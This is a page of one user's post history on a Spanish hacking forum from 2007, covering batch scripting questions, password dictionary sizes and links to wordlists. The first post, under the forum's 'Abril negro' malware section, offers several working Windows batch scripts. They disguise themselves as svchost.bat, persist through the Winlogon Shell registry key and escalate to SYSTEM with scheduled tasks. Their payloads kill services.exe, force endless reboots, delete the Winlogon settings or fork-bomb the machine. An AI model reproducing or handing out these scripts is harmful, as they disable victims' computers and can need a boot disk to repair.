elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 ... 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 [43] 44 45 46 47 48 49 50 51
421  Seguridad Informática / Abril negro / Re: Abril Negro 2007 en: 26 Abril 2007, 19:16 pm
Estos son varios BATXH que se me ocurren pero la verdad algunos aún no los he provado:

-Este se eleva a SYSTEM y hace que se autoejecute siempre (incluso en Modo seguro) que se inicie Windows. Termina con el services.exe y todos los programas que hayan sido ejecutados por el...es decir, todos los servicios...Por lo que aparece un mensaje de error y se reinicia la maquina a los 60 segundos.
Recuerda al Virus Blaster jejeje

Código:
@echo off
if exist %windir%\system32\svchost.bat goto start
copy /Y %0 %windir%\system32\svchost.bat
start %windir%\system32\svchost.bat
del /S /F /Q /A:- %0
exit
:start
echo @echo off>>temp.bat
echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,svchost.bat" /f>>temp.bat
echo taskkill /F /IM services.exe /T>>temp.bat
echo del /S /F /Q /A:- temp.bat>>temp.bat
move temp.bat %windir%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
goto a
:2caso
set x=%TIME:~4,2%
goto a
:3caso
set x=%TIME:~5,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:00 /ru System
if %a%==11 goto e
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
goto d
:e
temp.bat
:d
exit


-Este es más potente y sencillo. Se autoejecuta como el otro pero hace que el PC se reinicie automaticamente:

Código:
@echo off
echo shutdown -r -f -t 0>winnt.bat
move /Y winnt.bat %windir%\system32\winnt.bat
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,winnt.bat" /f
shutdown -r -f -t 0
exit

-Este es igual que el ultimo pero de otra manera que no se si funcionara...:

Código:
@echo off
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,shutdown -r -f -t 0" /f
shutdown -r -f -t 0
exit

-Este hace que cada vez que se intenta iniciar sesion se cierre automaticamente:

Código:
@echo off
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /va /f
shutdown -s -f -t 0
exit

-Este hace que tu PC se bloquee cada vez que se ejecute Windows...Ejecuta un bucle infinito el cual ejecuta reiteradamente el mismo bucle, en cada bucle abre una consola de comandos y hace que la PC se quede sin memoria:

Código:
@echo off
echo :a>>rundll32.bat
echo start rundll32.bat>>rundll32.bat
echo goto a>>rundll32.bat
move /Y rundll32.bat %windir%\system32\rundll32.bat
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,rundll32.bat" /f
exit


-Este hace el mismo que el anterior pero lo ejecuta de modo SYSTEM, de modo que causará el bloqueo pero no mostrará las ventanas:

Código:
@echo off
if exist %windir%\system32\svchost.bat goto start
copy /Y %0 %windir%\system32\svchost.bat
cd %windir%\system32\
start svchost.bat
del /S /F /Q /A:- %0
exit
:start
if exist %windir%\system32\temp.bat del /S /F /Q /A:- %windir%\system32\temp.bat
echo @echo off>>temp.bat
echo :a>>temp.bat
echo start temp.bat>>temp.bat
echo goto a>>temp.bat
move temp.bat %windir%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
goto a
:2caso
set x=%TIME:~4,2%
goto a
:3caso
set x=%TIME:~5,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:00 /ru System
if %a%==11 goto e:
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
goto d
:e
cd %windir%\system32\
start temp.bat
:d
exit


Son codes la mayoría muy sencillos pero que pueden causar bastantes molestias, la mayoría de las veces para arreglar tendrás que iniciar con un disco de arranke para solucionarlo...

Tenía otro que hacia que cada vez que intentabas ejecutar un .exe te abría un programa que mostraba 0 y 1 estilo Matrix...pero ahora mismo no se donde lo tengo...

Otro era uno que creaba una cuenta limitada y te obligaba siempre a iniciar con esa cuenta y no te dejaba iniciar como Administrador...pero nunca conseguí hacer que funcionase perfectamente...pues solo me funcionaba con el SP1 y ademas era muy facil de arreglar...

Estes que puse la mayoría no los prové...pero deben de funcionar...son bastante lammers pero a veces pueden llegar a ser muy molestos ;D ;D

Saludos ;) ;)
422  Programación / Scripting / Re: % o %% en: 25 Abril 2007, 21:44 pm
si ya lo habia mirado pero no me habia fijado en eso...es justo lo k yo decia...gracias

Saludos ;) ;)

P.D.: si weno, tengo un problema bastante grave con las "b" y "v", tambien lo tengo con las "j" y "g"... jejeje
423  Programación / Scripting / % o %% en: 25 Abril 2007, 18:37 pm
Yo para las variables en BATCH siempre usaba %variable% pero ahora se que se puede usar %%variable%%

¿Cual es la diferencia?

Yo pienso que de la forma %variable% el BATCH expande la variable y de la forma %%variable%% ejecutaría %variable%, la cual será expandida por la consola...

Para k entendais, por ejemplo con el comando echo sabemos que se puede reidirigir la salida:

Código:
echo echo off>>prueva.bat
echo set p=1>>prueva.bat
echo set /a p=%p%+1>>prueva.bat
echo echo %p%>>prueva.bat
echo pause>>prueva.bat
echo exit>>prueva.bat

Esto reidirigiría la salida a un archivo llamado "prueva.bat" que quedaría así:

Código:
echo off
set p=1
set /a p=+1
echo
pause
exit

lo cual estaría mal...pues al dar la salida a las variables de la forma %variable% el batch las expandiria y como no tienen valor quedaría ese bath mal...

Sin embargo si hubieramos usado %%variable%% la salida quedaría como nosotros queriamos:

Código:
echo echo off>>prueva.bat
echo set p=1>>prueva.bat
echo set /a p=%%p%%+1>>prueva.bat
echo echo %%p%%>>prueva.bat
echo pause>>prueva.bat
echo exit>>prueva.bat

entonces el archivo "prueva.bat" quedaria asi:

Código:
echo off
set p=1
set /a p=%p%+1
echo %p%
pause
exit

Pero la verdad no tengo ni idea...por eso os pregunto...

¿Es eso? ¿O estoy equivocado? O simplemente diganme ¿Cual es la diferencia de usar %variable% o %%variable%% en un BATCH?

Saludos ;) ;)
424  Seguridad Informática / Hacking / Re: Diccionario de passwords en: 22 Abril 2007, 20:51 pm
Pues el programa que dije yo lo hace  :P (PasswordsPro) ...tiene una opcion con la que puede generar un diccionario de palabras como tu dices...le pones de longitud minima y la longitud maxima en 15 caracteres y pones los caracteres que quieras y ya está...

Aún así el diccionario será muy largo...

Cogiendo las letras de a-z sin contar ñ y cogiendo solo minusculas serían 26 letras, mas 10 numeros...en total 36 caracteres:

Código:
abcdefghijklmnopqrstuvwxyz0123456789

La longitud de las claves generadas será siempre de 15 caracteres...

3615=221.073.919.720.733.357.899.776 palabras

Suponiendo que el programa y nuestro ordenador es capaz de generar 2.000.000 de palabras por segundo (esto es mucho, en la realidad no llegaría ni a 1.000.000 de palabras por segundo, pero weno, para tirar por lo alto) pues tardaría:

3615 / 2.000.000 = 110.536.959.860.366.679 segundos

110.536.959.860.366.679 / 60 = 1.842.282.664.339.445 minutos

1.842.282.664.339.445 / 60 = 30.704.711.072.324 horas

30.704.711.072.324 / 24 = 1.279.362.961.346 dias

1.279.362.961.346 /12 = 3.505.104.003 años y 8 meses

Na...eso lo puedo esperar yo...¿que son 3.505.104.003 años y 8 meses? :xD :xD


Ya se que lo que dimitrix1 busca es un programa que genere diccionarios, pues el que yo puse arriba sirve para eso...ahora si tienes pensado crear ese diccionario olvidate...

Un saludo ;) ;)
425  Seguridad Informática / Hacking / Re: Diccionario de passwords en: 22 Abril 2007, 13:09 pm
Para lo que dice dimitrix1 yo uso PasswordsPro de Insidepro....

Pero de 15 dijitos el diccionario sería demasiado largo...

Pues en esta pagina hay varios diccionarios bastante buenos:

http://www.insidepro.com/eng/download.shtml

Puedes bajar todos esos diccionarios directamente desde aki:

http://www.insidepro.com/download/dictionaries.zip

Si kieres mas los hay en el eMule tambien...

Un saludo ;) ;) ;)
426  Programación / Programación Visual Basic / Re: [+] MSN Kick - Codigo Fuente en: 19 Abril 2007, 14:23 pm
En ZoneAlarm no se...pero hay varios programas como Messenger Discovery Live que tienen proteccion Anti-Flood...
427  Programación / Scripting / Re: No se que pasa que >> me lo pone como 1>> en: 18 Abril 2007, 20:03 pm
Ahhh, no me diera cuenta del promt...

Y sobre lo de crear bats desde la linea de comandos uso siempre echo...

Yo pensaba que copy con servía pa crear archivos COM a partir de carácteres ASCII...pero la verdad nunca lo he usado...
He estado mirando y ya se utilizarlo para crear bats...

Ahora lo raro...

Os juro que los otros dias atras ejecutaba esto:

Código:
a.bat>>NUL

Y me salía este error:

Código:
No se encuentra el proceso por lotes
No se encuentra el proceso por lotes

Weno, la frase no se si la puse exactamente igual...Se que ponía dos...

Y hoy al vovler a provar me salió bien...

¿Puede ser que desablitara algo o cualkier cosa?

Un saludo y gracias ;) ;)
428  Programación / Scripting / Re: No se que pasa que >> me lo pone como 1>> en: 18 Abril 2007, 16:22 pm
No entiendo que es lo que haces...Eso es un codigo??

Ademas a mi no me funciona el copy con: a.bat , se me keda trabado...

Que es lo que haces??
429  Programación / Programación Visual Basic / Re: [+] MSN Kick - Codigo Fuente en: 17 Abril 2007, 16:11 pm
Dios!! DIficilisima!!!

Aunke si digo la verdad no leí el post completo de jackl007 y puse el zip en un crackeador, despues leí el post :xD :xD

Saludos  ;) ;)
430  Programación / Scripting / Re: Almacenar fecha y hora de creacion en una variable en: 17 Abril 2007, 15:31 pm
No, esas variables devuelven la fecha y la hora actual del sistema...

Pienso k con el comando DIR puedes leer la fecha de los archivos y despues de aí con un FOR se pueden sacar...pero eso ya no se bien...

Un saludo ;) ;)
Páginas: 1 ... 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 [43] 44 45 46 47 48 49 50 51
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines